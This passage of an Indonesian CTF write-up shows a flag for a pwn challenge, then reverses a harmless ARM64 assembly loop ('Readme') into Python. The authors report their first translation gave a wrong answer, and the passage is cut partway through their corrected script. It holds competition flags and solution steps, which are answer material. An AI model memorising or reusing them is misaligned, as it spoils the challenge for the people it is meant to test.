&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2Fw_lcPedXsmy_T9FlMhLmfPhrl-oFGnMEpbRDqdAudC4dse9XErP1Vp9H4ol3eQ5IVshxAwXu2EkFpstM9WT3Vv065hgTrtVliG8UpalL0h3h44Xc4FTcUl_ASI_srBkhw-BW6eeO" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh3.googleusercontent.com%2Fw_lcPedXsmy_T9FlMhLmfPhrl-oFGnMEpbRDqdAudC4dse9XErP1Vp9H4ol3eQ5IVshxAwXu2EkFpstM9WT3Vv065hgTrtVliG8UpalL0h3h44Xc4FTcUl_ASI_srBkhw-BW6eeO" alt="pwn" width="351" height="170"&gt;&lt;/a&gt;&lt;br&gt;
CSCCTF{on3_b4bySteP_At_a_t1mE}&lt;/p&gt;
&lt;h1&gt;
  
  
  Reverse Engineering
&lt;/h1&gt;
&lt;h2&gt;
  
  
  Readme
&lt;/h2&gt;

&lt;p&gt;Diberikan file asm dengan nama main.s, berikut penampakannya&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;.section    __TEXT,__text,regular,pure_instructions

.ios_version_min 11, 0    sdk_version 14, 2

.globl    _notmain                ; -- Begin function notmain

.p2align    2

_notmain:                               ; @notmain

   sub    sp, sp, #64             ; =64

   stp    x29, x30, [sp, #48]     ; 16-byte Folded Spill

   add    x29, sp, #48            ; =48

   stur    w0, [x29, #-4]

   stur    x1, [x29, #-16]

   mov    x8, #100

   str    x8, [sp, #24]

   str    wzr, [sp, #20]

LBB0_1:

   ldr    w8, [sp, #20]

   cmp    w8, #1337

   b.ge    LBB0_28

   ldr    w8, [sp, #20]

   mov    w9, #3

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_4

   ldr    x8, [sp, #24]

   add    x8, x8, #1000

   str    x8, [sp, #24]

   b    LBB0_26

LBB0_4:

   ldr    w8, [sp, #20]

   mov    w9, #4

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_6

   ldr    x8, [sp, #24]

   add    x8, x8, #100

   str    x8, [sp, #24]

   b    LBB0_25

LBB0_6:

   ldr    w8, [sp, #20]

   mov    w9, #5

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_8

   ldr    x8, [sp, #24]

   add    x8, x8, #10

   str    x8, [sp, #24]

   b    LBB0_24

LBB0_8:

   ldr    w8, [sp, #20]

   mov    w9, #6

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_10

   ldr    x8, [sp, #24]

   add    x8, x8, #1

   str    x8, [sp, #24]

   b    LBB0_23

LBB0_10:

   ldr    w8, [sp, #20]

   mov    w9, #7

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_12

   ldr    x8, [sp, #24]

   add    x8, x8, #2000

   str    x8, [sp, #24]

   b    LBB0_22

LBB0_12:

   ldr    w8, [sp, #20]

   mov    w9, #8

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_14

   ldr    x8, [sp, #24]

   add    x8, x8, #200

   str    x8, [sp, #24]

   b    LBB0_21

LBB0_14:

   ldr    w8, [sp, #20]

   mov    w9, #9

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_16

   ldr    x8, [sp, #24]

   add    x8, x8, #20

   str    x8, [sp, #24]

   b    LBB0_20

LBB0_16:

   ldr    w8, [sp, #20]

   mov    w9, #10

   sdiv    w10, w8, w9

   mul    w9, w10, w9

   subs    w8, w8, w9

   cbnz    w8, LBB0_18

   ldr    x8, [sp, #24]

   add    x8, x8, #2

   str    x8, [sp, #24]

   b    LBB0_19

LBB0_18:

   ldr    x8, [sp, #24]

   add    x8, x8, #1337

   str    x8, [sp, #24]

LBB0_19:

LBB0_20:

LBB0_21:

LBB0_22:

LBB0_23:

LBB0_24:

LBB0_25:

LBB0_26:

   ldr    w8, [sp, #20]

   add    w8, w8, #1

   str    w8, [sp, #20]

   b    LBB0_1

LBB0_28:

       ldr    x8, [sp, #24]

       adrp    x0, l_.str@PAGE

       add    x0, x0, l_.str@PAGEOFF

       mov    x9, sp

       str    x8, [x9]

       bl    _printf

       mov    w10, #0

       mov    x0, x10

       ldp    x29, x30, [sp, #48]

       add    sp, sp, #64

       ret

   .section    __TEXT,__cstring,cstring_literals

l_.str:                                 ## @.str

   .asciz    "%lld”
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Program akan melakukan operasi aritmatika, dan hasilnya akan di print. Flag adalah output dari program tersebut.&lt;/p&gt;

&lt;p&gt;Karena ini ARM, dan kami tidak pernah membaca assembly dari ARM, kami melakukan sedikit googling. Setelah melakukan googling dan analisa pada assembly yang diberikan, kami bisa menyimpulkan bahwa:&lt;br&gt;
    1. Program dimulai dari _notmain&lt;br&gt;
    2. Setelah perintah di _notmain selesai, selanjutnya program akan menjalankan perintah di LBB0_1&lt;br&gt;
    3. LBB0_1 merupakan looping, dimana kondisinya adalah w8 &amp;lt; 1337, dan pada fungsi LBB0_26, w8 akan ditambah 1 (increment)&lt;br&gt;
    4. Ada banyak sekali if statement (if dalam if, atau nested if), dengan statement yang serupa&lt;br&gt;
    5. Setelah melalui operasi aritmatika yang berada di dalam loop + nested if tadi, program akan menyimpan hasilnya di variabel x8, di print, dan program berakhir&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;

&lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

&lt;span class="n"&gt;sp20&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;1337&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

   &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;

   &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

   &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

   &lt;span class="c1"&gt;# print(w8)
&lt;/span&gt;
   &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

       &lt;span class="c1"&gt;# LBB0_4
&lt;/span&gt;
       &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

       &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;

       &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

       &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

       &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

       &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

           &lt;span class="c1"&gt;# LBB0_6
&lt;/span&gt;
           &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

           &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;

           &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

           &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

           &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

           &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

               &lt;span class="c1"&gt;# LBB0_8
&lt;/span&gt;
               &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

               &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;6&lt;/span&gt;

               &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

               &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

               &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

               &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                   &lt;span class="c1"&gt;# LBB0_10
&lt;/span&gt;
                   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

                   &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;7&lt;/span&gt;

                   &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                   &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

                   &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                       &lt;span class="c1"&gt;# LBB0_12
&lt;/span&gt;
                       &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

                       &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;8&lt;/span&gt;

                       &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                       &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                       &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

                       &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                           &lt;span class="c1"&gt;# LBB0_14
&lt;/span&gt;
                           &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

                           &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;9&lt;/span&gt;

                           &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                           &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                           &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

                           &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                               &lt;span class="c1"&gt;# LBB0_16
&lt;/span&gt;
                               &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

                               &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;

                               &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                               &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

                               &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

                               &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

                                   &lt;span class="c1"&gt;# LBB0_18
&lt;/span&gt;
                                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1337&lt;/span&gt;

                                   &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

                               &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                               &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;2&lt;/span&gt;

                               &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

                           &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                           &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;20&lt;/span&gt;

                           &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

                       &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                       &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt;

                       &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

                   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;2000&lt;/span&gt;

                   &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

               &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

               &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

               &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

           &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

           &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;10&lt;/span&gt;

           &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

       &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

       &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;

       &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

   &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

   &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1000&lt;/span&gt;

   &lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

   &lt;span class="c1"&gt;# LBB0_26
&lt;/span&gt;
   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;

   &lt;span class="n"&gt;sp20&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;

&lt;span class="c1"&gt;# LBB0_28
&lt;/span&gt;
&lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp24&lt;/span&gt;

&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;x8&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Hasilnya adalah:&lt;br&gt;
&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F4lLeeB25lNJFJfxa4vII4wLi5rwTW09hpMIJ1ZpnWUaWnUuriFKpGBHi2N79wWtLtutarVA8Mq8FxPrOF8xKJWH_rMcwgNpJkafIFusc-Za8Vj2vX-doJ283kCb_tk719Nkmo3IO" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Flh6.googleusercontent.com%2F4lLeeB25lNJFJfxa4vII4wLi5rwTW09hpMIJ1ZpnWUaWnUuriFKpGBHi2N79wWtLtutarVA8Mq8FxPrOF8xKJWH_rMcwgNpJkafIFusc-Za8Vj2vX-doJ283kCb_tk719Nkmo3IO" alt="hasil" width="101" height="23"&gt;&lt;/a&gt;&lt;br&gt;
Coba submit, eh salah :((&lt;/p&gt;

&lt;p&gt;Setelah bingung selama kurang lebih 1 jam (dan coba nebak flag), kami menyadari 1 hal. Pada saat perintah cbnz, kita mencoba menambahkan else setelah melakukan pengecekan kalau w8 bernilai 0 atau tidak (Compare and Branch on Non-Zero). Jadi kita menambahkan tambahan else pada setiap if yang ada. Berikut adalah script python nya&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="c1"&gt;# not_main
&lt;/span&gt;
&lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="n"&gt;x8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;

&lt;span class="n"&gt;sp24&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;x8&lt;/span&gt;

&lt;span class="n"&gt;sp20&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;

&lt;span class="c1"&gt;# LBB0_1
&lt;/span&gt;
&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;1337&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

   &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;3&lt;/span&gt;

   &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

   &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

   &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

   &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

       &lt;span class="c1"&gt;# LBB0_4
&lt;/span&gt;
       &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

       &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;4&lt;/span&gt;

       &lt;span class="n"&gt;w10&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt;&lt;span class="o"&gt;//&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

       &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w10&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;w9&lt;/span&gt;

       &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt; &lt;span class="n"&gt;w9&lt;/span&gt;

       &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;

           &lt;span class="c1"&gt;# LBB0_6
&lt;/span&gt;
           &lt;span class="n"&gt;w8&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sp20&lt;/span&gt;

           &lt;span class="n"&gt;w9&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;5&lt;/span&gt;

